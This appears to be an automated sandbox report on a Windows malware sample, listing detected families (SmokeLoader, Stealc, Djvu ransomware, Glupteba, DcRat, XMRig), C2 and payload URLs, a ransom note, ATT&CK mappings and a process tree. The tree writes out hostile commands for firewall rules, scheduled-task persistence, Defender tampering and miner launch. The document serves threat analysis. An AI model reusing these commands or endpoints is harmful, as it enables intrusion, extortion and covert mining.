Overview

overview

10

Static

static

3

file.exe

windows10-2004-x64

10

Resubmissions

03-02-2024 11:37

240203-nrgycaaecm 10

02-02-2024 19:15

240202-xyamaaddb7 10

01-02-2024 20:32

240201-zbg4ysdgc7 10

01-02-2024 19:55

240201-ym4lnaddf5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1808s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-02-2024 11:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    6.3MB

  • MD5

    c67cb967230036816fd0cbbfd96959c6

  • SHA1

    d2fe988a302dce4bc0f34a1003a623f96a06b250

  • SHA256

    d2682ee0fe9e5bf429b7bea89d32cf417c3b684429dbff5e060b07e7335aaa76

  • SHA512

    2f51046e44bdfa470f676071c69da8c05d50d8f79e748748f25ac13ec53d346f1c3988148000fea3ece38623fd629d1b3dcc943006e80b7bee95da7f1f42920c

  • SSDEEP

    196608:GHqO3grg0lAc4G+JCJjsP8BXkf/hmzJzFYngA13jvHKvj4:GHzCOc4G+oB0BmdFY31zq

Score
10/10
dcratdjvugluptebasmokeloaderstealcxmrigpub1backdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwareratrootkitspywarestealertrojanupx

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php
rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://habrafa.com/test1/get.php

Attributes
  • extension

    .cdcc

  • offline_id

    LBxKKiegnAy53rpqH3Pj2j46vwldiEt9kqHSuMt1

  • payload_url

    http://brusuax.com/dl/build2.exe

    http://habrafa.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-iVcrVFVRqu Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0846ASdw

rsa_pubkey.plain

Signatures

  • DcRat 9 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detected Djvu ransomware 7 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • XMRig Miner payload 4 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Renames multiple (125) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 16 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • GoLang User-Agent 12 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
      "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1236
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4320
      • C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
        "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Checks for VirtualBox DLLs, possible anti-VM trick
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:4328
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:4992
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:792
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            5⤵
            • Modifies Windows Firewall
            PID:216
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:5056
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:4676
        • C:\Windows\rss\csrss.exe
          C:\Windows\rss\csrss.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Manipulates WinMonFS driver.
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:5092
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:4804
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            5⤵
            • DcRat
            • Creates scheduled task(s)
            PID:228
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /delete /tn ScheduledUpdate /f
            5⤵
              PID:2268
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:640
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:3420
            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              5⤵
              • Executes dropped EXE
              PID:3332
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • DcRat
              • Creates scheduled task(s)
              PID:4360
            • C:\Windows\windefender.exe
              "C:\Windows\windefender.exe"
              5⤵
              • Executes dropped EXE
              PID:2648
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                  PID:1440
                  • C:\Windows\SysWOW64\sc.exe
                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                    • Launches sc.exe
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5096
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:4372
              • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                5⤵
                • Executes dropped EXE
                PID:3060
                • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --tls --nicehash -o showlock.net:443 --rig-id 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --tls --nicehash -o showlock.net:80 --rig-id 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --nicehash --http-port 3433 --http-access-token 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --randomx-wrmsr=-1
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:3468
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe -hide 3468
                  6⤵
                  • Executes dropped EXE
                  • Manipulates WinMon driver.
                  PID:3344
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    7⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4976
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:4500
              • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                5⤵
                • Executes dropped EXE
                PID:2756
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:1804
              • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                5⤵
                • Executes dropped EXE
                PID:4012
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:1716
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:2280
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:4832
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:3172
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:2292
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:2404
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:4356
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                PID:4888
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:4748
        • C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
          "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4760
          • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
            C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3884
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                5⤵
                  PID:1292
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                  5⤵
                  • DcRat
                  • Creates scheduled task(s)
                  PID:1012
            • C:\Users\Admin\AppData\Local\Temp\nscA4E.tmp
              C:\Users\Admin\AppData\Local\Temp\nscA4E.tmp
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:3748
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nscA4E.tmp" & del "C:\ProgramData\*.dll"" & exit
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4896
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 5
                  5⤵
                  • Delays execution with timeout.exe
                  PID:1680
          • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
            "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:5064
        • C:\Users\Admin\AppData\Local\Temp\917D.exe
          C:\Users\Admin\AppData\Local\Temp\917D.exe
          1⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4228
        • C:\Users\Admin\AppData\Local\Temp\A9AA.exe
          C:\Users\Admin\AppData\Local\Temp\A9AA.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4868
          • C:\Users\Admin\AppData\Local\Temp\A9AA.exe
            C:\Users\Admin\AppData\Local\Temp\A9AA.exe
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:4544
            • C:\Windows\SysWOW64\icacls.exe
              icacls "C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              3⤵
              • Modifies file permissions
              PID:1664
            • C:\Users\Admin\AppData\Local\Temp\A9AA.exe
              "C:\Users\Admin\AppData\Local\Temp\A9AA.exe" --Admin IsNotAutoStart IsNotTask
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1636
              • C:\Users\Admin\AppData\Local\Temp\A9AA.exe
                "C:\Users\Admin\AppData\Local\Temp\A9AA.exe" --Admin IsNotAutoStart IsNotTask
                4⤵
                • Executes dropped EXE
                PID:560
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 568
                  5⤵
                  • Program crash
                  PID:2596
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 560 -ip 560
          1⤵
            PID:2284
          • C:\Users\Admin\AppData\Local\Temp\EB67.exe
            C:\Users\Admin\AppData\Local\Temp\EB67.exe
            1⤵
            • Executes dropped EXE
            PID:5112
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 608
              2⤵
              • Program crash
              PID:4412
          • C:\Windows\windefender.exe
            C:\Windows\windefender.exe
            1⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            PID:5116
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5112 -ip 5112
            1⤵
              PID:4440
            • C:\Users\Admin\AppData\Roaming\istwtus
              C:\Users\Admin\AppData\Roaming\istwtus
              1⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:4424
            • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
              C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1768
              • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
                C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
                2⤵
                • Executes dropped EXE
                PID:2396
            • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
              C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2140
              • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
                C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
                2⤵
                • Executes dropped EXE
                PID:3604
            • C:\Users\Admin\AppData\Roaming\istwtus
              C:\Users\Admin\AppData\Roaming\istwtus
              1⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:3916
            • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
              C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1116
              • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
                C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
                2⤵
                • Executes dropped EXE
                PID:3212
            • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
              C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1504
              • C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe
                C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task
                2⤵
                • Executes dropped EXE
                PID:2328
            • C:\Users\Admin\AppData\Roaming\istwtus
              C:\Users\Admin\AppData\Roaming\istwtus
              1⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:1364

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Scheduled Task/Job

            1
            T1053

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            1
            T1543

            Windows Service

            1
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            1
            T1543

            Windows Service

            1
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Defense Evasion

            File and Directory Permissions Modification

            1
            T1222

            Impair Defenses

            1
            T1562

            Disable or Modify System Firewall

            1
            T1562.004

            Modify Registry

            1
            T1112

            Credential Access

            Unsecured Credentials

            3
            T1552

            Credentials In Files

            3
            T1552.001

            Discovery

            Network Service Discovery

            1
            T1046

            Peripheral Device Discovery

            1
            T1120

            Query Registry

            5
            T1012

            System Information Discovery

            5
            T1082

            Lateral Movement

            Collection

            Data from Local System

            3
            T1005

            Command and Control

            Web Service

            1
            T1102

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\Are.docx
              Filesize

              11KB

              MD5

              a33e5b189842c5867f46566bdbf7a095

              SHA1

              e1c06359f6a76da90d19e8fd95e79c832edb3196

              SHA256

              5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

              SHA512

              f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

              Download Submit

            • C:\ProgramData\mozglue.dll
              Filesize

              593KB

              MD5

              c8fd9be83bc728cc04beffafc2907fe9

              SHA1

              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

              SHA256

              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

              SHA512

              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

              Download Submit

            • C:\ProgramData\nss3.dll
              Filesize

              2.0MB

              MD5

              1cc453cdf74f31e4d913ff9c10acdde2

              SHA1

              6e85eae544d6e965f15fa5c39700fa7202f3aafe

              SHA256

              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

              SHA512

              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
              Filesize

              1KB

              MD5

              a1b93d65299e4a4290d9819094c12b7f

              SHA1

              72994579854c3d8795fbd5525730d8726d82d1bd

              SHA256

              4f89d640a400d3d8fdbaa5998a4a3d74408902a695da46e247e9ea1e68cb92a3

              SHA512

              a723e161b8766b89fe10b812ee449fe565557b04072a1a81ccbb3e86dbd9658daea7c9e9fc58eb3ae859f89f3f62e8727004c4e048a742f44ac5de072a4a134e

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
              Filesize

              724B

              MD5

              8202a1cd02e7d69597995cabbe881a12

              SHA1

              8858d9d934b7aa9330ee73de6c476acf19929ff6

              SHA256

              58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

              SHA512

              97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
              Filesize

              410B

              MD5

              93ba648071b88702b157c25842ab583f

              SHA1

              5c78d66c7b0ef183ab7a7bb6b3655b760c3b129a

              SHA256

              9fe11af4cbdcff4f41a4349909e1d5bde51eb91c20b7087c764acb0d468d4531

              SHA512

              d03bfaf6cc2728ea94389b41212a7239a4d611c02da403a5171dc0afce1ad6de4e62c7b55337973ca8d6209aac29d84dfdf19765cb03f0862b6d5c1558a50e4b

              Download Submit

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
              Filesize

              392B

              MD5

              c54e4abb4f1ddb67fa93e6228e7fc82c

              SHA1

              a1b32b8c5c8b2139295c2418679f43bfdf04745b

              SHA256

              adda0847aef0effaea122eb50fd132fb90f671e01cdc986f251bb368b15d9377

              SHA512

              fa86769011dfd101028162b29787064ed5b35fc871fcdaa65dccd7e59462c424d5e43027e6adca782c2020728b5d32e5eb81d2fdbfe9cf9d04e72e8d199059db

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\917D.exe
              Filesize

              238KB

              MD5

              8c20d9745afb54a1b59131314c15d61c

              SHA1

              1975f997e2db1e487c1caf570263a6a3ba135958

              SHA256

              a613b6598e0d4c2e52e6ff91538aca8d92c66ef7c13a9baadcba0039570a69d1

              SHA512

              580021850dfc90647854dd9f8124418abffbe261e3d7f2e1d355dd3a40f31be24f1b9df77ad52f7fa63503a5ee857e270c156e5575e3a32387335018296128d7

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\A9AA.exe
              Filesize

              739KB

              MD5

              39f339095f6c8da48c51be1a9514bf51

              SHA1

              3c16aa7906954d749f092aa0e0aa0609b03f5ff4

              SHA256

              2852489fb27c2d94e63e2aa3f46f4aa5489d6efda911735ef3174751ac95c6a2

              SHA512

              126b9e062c382b6f1cc8b0159de06def620f9f5c27604eb2429699d61be30f92c59587ab19d11963adfc4b13e51b56e866d6cb8b29fbdbfbdefd2f810246a50b

              Download Submit

